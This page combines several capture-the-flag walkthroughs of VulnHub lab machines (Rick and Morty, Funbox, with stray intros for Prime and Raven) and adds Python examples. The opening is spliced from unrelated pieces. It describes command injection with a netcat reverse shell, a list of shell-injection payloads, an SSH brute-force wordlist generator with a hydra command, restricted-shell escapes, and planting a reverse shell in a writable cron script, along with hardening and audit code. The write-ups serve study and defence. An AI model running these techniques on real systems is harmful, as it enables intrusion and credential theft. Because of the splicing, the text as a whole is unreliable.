Prime: 1 Vulnhub Walkthrough, September 7, 2019 (updated February 11, 2021), by Raj Chandel. Prime writeup: one of our other CTF challenges for CTF players; it can be downloaded from VulnHub here. Vulnhub Raven 1 Walkthrough. Intro: Raven 1 is listed as a beginner/intermediate CTF box on VulnHub. I would classify it more as beginner but it. Welcome to the walkthrough for Raven, a boot2root CTF found on VulnHub. This is the first in my VulnHub Challenge series, which I'm doing to keep my offensive skills sharp. To be fair, I'm starting off easy and then moving on to more challenging machines. The description: 'Raven 2 is an intermediate level boot2root VM. There are four flags to capture. After multiple breaches, Raven Security has taken extra steps to harden their web server to prevent hackers from getting in.'
A new Boot2Root came online on VulnHub and it looked like fun. This one is themed around a cartoon show called 'Rick and Morty'.
First order of business for me is to run an Nmap scan. I like to do a full TCP port scan with service enumeration (nmap -p- -sV against the target).
Before hitting the well-known ports, I will inspect the interesting ones. Port 9090 is identified within the VM as the management interface. I connected to it via HTTPS and got the first flag:
FLAG {There is no Zeus, in your face!} – 10 points
Connecting to port 13337 with netcat reveals yet another flag:
FLAG:{TheyFoundMyBackDoorMorty}-10Points
Connecting to port 60000 gave me a sort of 'fake' shell to play around with. I saw there is a file named FLAG.txt so reading that file gave me the flag.
FLAG{Flip the pickle Morty!} – 10 Points
Running Nmap with its default scripts (the -sC flag) shows that the FTP server allows anonymous login. I connected to it from within my web browser.
There was a flag file inside to download:
FLAG{Whoa this is unexpected} – 10 Points
Moving on now to the main web app, I reviewed the source code, but there isn't much to look at. Running a spider or simply requesting the common robots.txt file in the web root reveals this:
Root_shell.cgi is a troll, but tracertool.cgi is pretty interesting. It is a web application that performs a traceroute to a given IP. Since user input that ends up on a command line is an obvious candidate for command injection, I inserted a semicolon to run a separate command. I used netcat to send myself a reverse shell:
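The injection above, as an added example that is not the walkthrough's own code and not the VM's tracertool.cgi: a minimal Python reconstruction of the bug beside its fix. It stands `echo` in for the traceroute binary so it runs offline and unprivileged, and the payload list is constructed for the example. The vulnerable handler hands a string to the shell; the hardened one allow-lists an IP literal with the `ipaddress` module and passes argv as a list so nothing is ever parsed by a shell.

```python
import ipaddress
import subprocess

# Stand-in for the traceroute binary so the example runs anywhere, offline and
# unprivileged: "echo tracing <target>" prints what the real tool would be given.
TRACE_CMD = ["echo", "tracing"]


def vulnerable_trace(target: str) -> str:
    """The bug as the CGI had it: the user's input is pasted into a shell line.

    With shell=True the string goes to /bin/sh, so ';', '|', '&&', '$( )',
    backticks or a newline in `target` terminate the intended command and
    start an attacker-chosen one.
    """
    cmdline = " ".join(TRACE_CMD) + " " + target
    proc = subprocess.run(cmdline, shell=True, capture_output=True, text=True)
    return proc.stdout


def validate_target(target: str) -> str:
    """Allow-list check: the only acceptable input is an IP address literal.

    ipaddress.ip_address() rejects anything that is not a well-formed IPv4 or
    IPv6 address, which covers every shell metacharacter and also option-style
    input such as "-o /tmp/x" that a denylist of ';' would let through.
    """
    try:
        return str(ipaddress.ip_address(target.strip()))
    except ValueError:
        raise ValueError(f"refusing non-IP target {target!r}") from None


def hardened_trace(target: str) -> str:
    """Validate first, then pass argv as a list so no shell ever parses it."""
    argv = TRACE_CMD + [validate_target(target)]
    proc = subprocess.run(argv, capture_output=True, text=True)  # shell=False
    return proc.stdout


# Constructed payloads (not from the walkthrough) covering the usual ways to
# chain a second command onto the first; a filter that only strips ';' would
# catch just the first of them.
INJECTION_PAYLOADS = [
    "127.0.0.1; echo INJECTED",
    "127.0.0.1 | echo INJECTED",
    "127.0.0.1 && echo INJECTED",
    "127.0.0.1 $(echo INJECTED)",
    "127.0.0.1 `echo INJECTED`",
    "127.0.0.1\necho INJECTED",
]


def all_rejected(payloads=INJECTION_PAYLOADS) -> bool:
    """True when the allow-list refuses every payload in the list."""
    for p in payloads:
        try:
            validate_target(p)
            return False
        except ValueError:
            continue
    return True


if __name__ == "__main__":
    print(vulnerable_trace(INJECTION_PAYLOADS[0]), end="")  # tracing 127.0.0.1 / INJECTED
    print(hardened_trace("127.0.0.1"), end="")              # tracing 127.0.0.1
    print("all payloads rejected:", all_rejected())
```

Validation alone is not the fix: the list-form `subprocess.run` is what guarantees that even a validator bug cannot reach a shell, and the validator is what stops option injection into the real traceroute.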
After getting a shell I started poking around. Looking in the html directory I saw a passwords folder.
Requesting it in the web browser reveals the FLAG.txt.
FLAG{Yeah d- just don't do it.} – 10 Points
Also worth noting is the passwords.html file. Looking at it doesn't tell much, but when I viewed the source, I saw a password hidden in an HTML comment.
At this point I found that the 'cat' command was aliased to a command that just printed a picture of a cat. To still read files, I used a grep pattern that matches every line (a backslash before the name, as in \cat, or the full path /bin/cat also bypasses an alias, since aliases are expanded only by the interactive shell):
Running this command I could see all the users on the system.
Knowing the password I found was 'winter', I figured it belonged to Summer. Port 22222 was running OpenSSH, so I used that to connect as the 'Summer' user account.
Once logged in as Summer, I saw another FLAG.txt waiting for me.
FLAG{Get off the high road Summer!} – 10 Points
Summer also had read access to some other users' home directories.
Morty had several interesting files in his home directory. I exfiltrated them with SCP.
Safe_Password.jpg was an image file, but viewing the EXIF data or simply running strings on the file showed that a password was embedded in it.
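The strings trick above, as an added example and not code from the walkthrough: a small `strings`-style extractor in Python run over a constructed JPEG-like byte blob. The real Safe_Password.jpg is not reproduced; the embedded 'CONSTRUCTED_SECRET_42' and 'CONSTRUCTED_WIDE' values are placeholders. It also scans for UTF-16LE runs, which `strings -el` would find and a plain `strings` would miss, and then filters for credential-looking lines.

```python
import re

# Constructed sample, not the walkthrough's Safe_Password.jpg: a JPEG start-of-image
# marker, an APP1 (Exif) segment, a COM segment and an end-of-image marker, carrying
# the kind of metadata text an EXIF viewer or `strings` would surface.
SAMPLE_JPEG = (
    b"\xff\xd8"                                  # SOI
    + b"\xff\xe1\x01\x00"                        # APP1 marker + length (illustrative)
    + b"Exif\x00\x00"                            # Exif header
    + b"\x00\x01\x02\x03" * 4                    # binary TIFF-directory filler
    + b"ImageDescription: not the password"
    + b"\x00\xff\xfe"                            # COM marker
    + b"Password hint: CONSTRUCTED_SECRET_42"
    + b"\xff\xd9"                                # EOI
)

# Constructed sample holding a UTF-16LE string, as Windows-written metadata often is.
SAMPLE_WIDE = b"\x00\x00" + "Wide secret: CONSTRUCTED_WIDE".encode("utf-16-le") + b"\x00"


def extract_strings(data: bytes, min_len: int = 4) -> list:
    """Runs of at least min_len printable ASCII bytes, like `strings -n <min_len>`."""
    pattern = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    return [m.group().decode("ascii") for m in pattern.finditer(data)]


def extract_wide_strings(data: bytes, min_len: int = 4) -> list:
    """Runs of at least min_len printable characters in UTF-16LE, like `strings -el`."""
    pattern = re.compile(rb"(?:[\x20-\x7e]\x00){%d,}" % min_len)
    return [m.group().decode("utf-16-le") for m in pattern.finditer(data)]


CREDENTIAL_KEYWORDS = ("password", "passwd", "passphrase", "pwd", "secret")


def credential_hints(strings: list, keywords=CREDENTIAL_KEYWORDS) -> list:
    """Strings that mention a credential-like keyword, case-insensitively."""
    return [s for s in strings if any(k in s.lower() for k in keywords)]


def hunt(data: bytes) -> list:
    """Every credential-looking string in a blob, narrow and wide encodings together."""
    return credential_hints(extract_strings(data) + extract_wide_strings(data))


if __name__ == "__main__":
    for hit in hunt(SAMPLE_JPEG) + hunt(SAMPLE_WIDE):
        print(hit)
```

On a real file the same functions take `open(path, "rb").read()`; the keyword filter is only a first pass, so read the full string list when it comes up empty.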
I also pulled down the journal.txt.zip file.
Unzipping the file and supplying the password gave me journal.txt:
Reading this file gave me the next flag, and a password.
FLAG: {131333} – 20 Points
When looking in Rick's home folder, I could see his safe.
Summer does not have execute permission on the 'safe' binary and does not own it, but she does have read permission. I copied it to a directory she controls; the copy is owned by Summer, so she can set the execute bit and run it.
Running the binary and supplying the password from the journal gave me the next flag.
FLAG{And Awwwaaaaayyyy we Go!} – 20 Points
I was also given a hint for Rick's password. I don't watch the TV show, but a quick Google search found that the band's name was 'The Flesh Curtains'.
I wrote a simple Python script to generate all the possible passwords given the constraints:
After running this script and saving the output to a file, I used THC Hydra to brute-force SSH.
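The wordlist step above, as an added reconstruction in Python and not the author's script (which the page does not show). The constraints it encodes are an assumption: one uppercase letter, one digit and one word of the band name, in any order; the single-order variant is kept for comparison, and the output file name is a placeholder.

```python
import itertools
import string

BAND_NAME = "The Flesh Curtains"  # band name from the walkthrough

# Assumed constraints (the page does not repeat the hint): the password is made
# of exactly one uppercase letter, one digit and one word of the band name.
# Because the assumed hint gives no order, all six orderings of the three parts
# are generated; all_orders=False produces only uppercase + digit + word.


def band_words(name=BAND_NAME):
    """The words that can appear in the password, as given in the band name."""
    return name.split()


def candidates(words=None, all_orders=True):
    """Every password matching the assumed constraints, without duplicates."""
    parts = (string.ascii_uppercase, string.digits, tuple(words or band_words()))
    orders = itertools.permutations(range(3)) if all_orders else [(0, 1, 2)]
    seen = set()
    result = []
    for order in orders:
        for combo in itertools.product(*(parts[i] for i in order)):
            pw = "".join(combo)
            if pw not in seen:       # no ordering can collide here, but stay safe
                seen.add(pw)
                result.append(pw)
    return result


def write_wordlist(path, words):
    """One candidate per line, the format hydra's -P option reads; returns the count."""
    with open(path, "w", encoding="ascii") as fh:
        fh.write("\n".join(words) + "\n")
    return len(words)


if __name__ == "__main__":
    pws = candidates()
    print(write_wordlist("rick_candidates.txt", pws), "candidates written")  # 4680
```

With the list written, the SSH attack is `hydra -l <user> -P rick_candidates.txt -s 22222 -t 4 ssh://<target>`; keeping the task count low (-t 4) avoids tripping sshd's connection limits, which otherwise produce false negatives.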
Once I found the valid password, I connected to Rick's account.
I ran sudo -l to enumerate his permissions:
Rick had sudo permission for ALL commands, so I just popped into an interactive root shell:
In the /root/ directory, there was another FLAG.txt.
FLAG: {Ionic Defibrillator} – 30 points
At this point I was root and had collected all 130 points.
Walkthrough
IP of the target: 192.168.1.13
As usual I started with an nmap scan to find open ports and services, using the command shown below:
Ports 21/FTP, 22/SSH, 80/HTTP and 3306/MySQL are open. Anonymous login is not allowed on FTP, so let's move on to port 80. Opening it in the browser gives the error 'funbox.fritz.box's server IP address could not be found', because the site redirects to that hostname; I solved this by adding the line "192.168.1.13 funbox.fritz.box" to the /etc/hosts file:
Now I can access the web application, and from the theme I was sure this was 'Just another WordPress site', so I started enumeration with wpscan.
So I have two usernames; the next step is to brute-force the passwords of these users with the rockyou.txt wordlist.
That's it, we found the admin user's password. We could log into the admin panel and pop a reverse shell as www-data from there, but I thought to try these credentials for SSH login first, and yes, I was in as user joe.
That's nice. I started enumerating different directories, but I was unable to change directory: the cd /home command gives the error -rbash: cd: restricted. There are many ways to bypass this.
After some enumeration I found an interesting file in the /home/funny/ directory.
This message clearly means that .backup.sh is running as user funny, so in the next step I simply edited .backup.sh to contain a reverse shell.
After waiting some time I got a shell as the funny user. After more enumeration I couldn't find anything to get root, so I terminated the current reverse shell and started listening again on the same port, and this time I got a shell as root.
Listening again on same port:
And here is the actual catch of this machine.
NOTE: .backup.sh runs as a cron job. After gaining root access, I checked the crontabs of both users (funny and root) and found this:
This is for user funny:
For user root:
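The misconfiguration this machine turns on, a cron entry whose script is writable by someone other than the user it runs as, as an added Python audit that is not part of the original post. It parses both the system crontab format (schedule, user, command) and per-user tables, and `demo()` runs it against a constructed sandbox (a temporary directory with fake backup.sh and rotate.sh files) rather than the Funbox VM's real files; every path and username in it is an assumption for the example.

```python
import os
import pwd
import stat
import tempfile

SCHEDULE_FIELDS = 5  # minute hour day-of-month month day-of-week


def parse_crontab(text, system_crontab=True, default_user="root"):
    """Return (user, command) pairs from crontab text.

    system_crontab=True is the /etc/crontab and /etc/cron.d format, where a
    user field follows the schedule. For per-user tables (`crontab -l`) pass
    system_crontab=False and the table's owner as default_user.
    """
    entries = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        head = line.split(None, 1)[0]
        if "=" in head:                       # environment line such as PATH=...
            continue
        n_sched = 1 if head.startswith("@") else SCHEDULE_FIELDS   # @reboot etc.
        n_before_cmd = n_sched + (1 if system_crontab else 0)
        parts = line.split(None, n_before_cmd)
        if len(parts) <= n_before_cmd:        # malformed line with no command
            continue
        user = parts[n_sched] if system_crontab else default_user
        entries.append((user, parts[-1]))
    return entries


def script_path(command):
    """The file cron executes: the first word, or the argument after an interpreter."""
    words = command.split()
    if not words:
        return None
    interpreters = ("sh", "bash", "dash", "python", "python3", "perl")
    if os.path.basename(words[0]) in interpreters and len(words) > 1:
        return words[1]
    return words[0]


def audit_entries(entries):
    """Flag entries whose script can be modified by someone other than root or
    the cron user. Relative paths are skipped: whether they are attackable
    depends on the PATH cron runs with."""
    findings = []
    for cron_user, command in entries:
        path = script_path(command)
        if not path or not os.path.isabs(path):
            continue
        try:
            st = os.stat(path)
        except OSError:
            continue
        reasons = []
        if st.st_mode & stat.S_IWOTH:
            reasons.append("world-writable")
        if st.st_mode & stat.S_IWGRP:
            reasons.append("group-writable")
        try:
            owner = pwd.getpwuid(st.st_uid).pw_name
        except KeyError:
            owner = str(st.st_uid)
        if owner not in ("root", cron_user):
            reasons.append(f"owned by {owner}")
        parent = os.stat(os.path.dirname(path))
        if parent.st_mode & stat.S_IWOTH and not parent.st_mode & stat.S_ISVTX:
            reasons.append("directory world-writable (file can be replaced)")
        if reasons:
            findings.append({"user": cron_user, "path": path, "reasons": reasons})
    return findings


def demo():
    """Audit a constructed sandbox (not the Funbox VM's real files)."""
    me = pwd.getpwuid(os.getuid()).pw_name
    root = tempfile.mkdtemp(prefix="cron-audit-")      # mode 0700, not world-writable
    risky = os.path.join(root, "backup.sh")
    safe = os.path.join(root, "rotate.sh")
    for p in (risky, safe):
        with open(p, "w") as fh:
            fh.write("#!/bin/sh\necho constructed\n")
    os.chmod(risky, 0o777)   # anyone can append a reverse shell to this one
    os.chmod(safe, 0o755)
    crontab = (
        "PATH=/usr/bin:/bin\n"
        f"*/1 * * * * root {risky}\n"                       # writable script run as root
        f"*/1 * * * * {me} {safe}\n"                        # owned and run by the same user
        f"@reboot root /bin/sh {risky} >/dev/null 2>&1\n"   # same script via an interpreter
    )
    return audit_entries(parse_crontab(crontab, system_crontab=True))


if __name__ == "__main__":
    for f in demo():
        print(f["user"], f["path"], ", ".join(f["reasons"]))
```

On a live box, feed it `open("/etc/crontab").read()` plus each file under /etc/cron.d, and each user's `crontab -l` output with `system_crontab=False`; the two crontab listings in this walkthrough are exactly the case the `owned by` and `world-writable` checks exist for.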
So that's the reason I got a root shell by listening on the same port again after some time. I hope you like the walkthrough :)
NOTE: The awesome artwork used in this article was created by Anton Fritsler.